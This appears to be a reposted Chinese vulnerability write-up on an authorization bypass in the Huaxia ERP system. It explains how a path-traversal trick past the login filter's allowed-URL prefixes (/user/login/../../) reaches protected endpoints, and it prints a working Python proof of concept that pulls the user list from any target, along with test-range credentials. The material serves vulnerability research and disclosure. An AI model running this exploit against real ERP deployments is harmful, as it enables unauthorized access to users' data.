继续这个测试靶场。。
靶场地址 |
http://47.116.69.14 |
|
账户密码 |
jsh |
123456 |
1、描述
华夏ERP基于SpringBoot框架和SaaS模式,可以算作是国内人气比较高的一款ERP项目,但经过源码审计发现其存在多个漏洞,本篇为第二处授权绕过漏洞。
2、影响范围
华夏ERP
3、漏洞复现
从开源项目本地搭建来进行审计,源码下载地址:
百度网盘 https://pan.baidu.com/s/1jlild9uyGdQ7H2yaMx76zw 提取码:814g
漏洞复现:
1、漏洞代码位置,利用filter做登录判断
com.jsh.erp.filter.LogCostFilter
如果URL开头匹配到了allowUrls中的内容则不跳转登录界面
追踪一下allowUrls的值:
allowUrls将/user/login#/user/registerUser以#分割成数组:
[“/user/login”,”/user/registerUser”]
下面我们需要将url开头设置为数组中的内容即可:
就比如/user/login/
或者设置为/user/registerUser/
POC
使用方法:
python3 华夏ERP授权绕过2.py http://ip:port
源码:
import sys,requests
def main(ip):
url = "{ip}/user/login/../../user/getUserList?search=%7B%22userName%22%3A%22%22%2C%22loginName%22%3A%22%22%7D¤tPage=1&pageSize=15".format(ip=ip)
res = requests.get(url,verify=False,timeout=5)
if res.status_code == 200:
print("+ {ip} 访问成功n{data}".format(ip=ip,data=res.text))
main(sys.argv[1])
最后再给大家介绍一下漏洞库,地址:wiki.xypbk.com
本站暂不开源,因为想控制影响范围,若因某些人乱搞,造成了严重后果,本站将即刻关闭。
漏洞库内容来源于互联网&&零组文库&&peiqi文库&&自挖漏洞&&乐于分享的师傅,供大家方便检索,绝无任何利益。
由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。
若有愿意分享自挖漏洞的佬师傅请公众号后台留言,本站将把您供上,并在此署名,天天烧香那种!
扫取二维码获取
更多精彩
Qingy之安全
点个在看你最好看
本文始发于微信公众号(Qingy之安全):华夏ERP另一处授权绕过漏洞
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论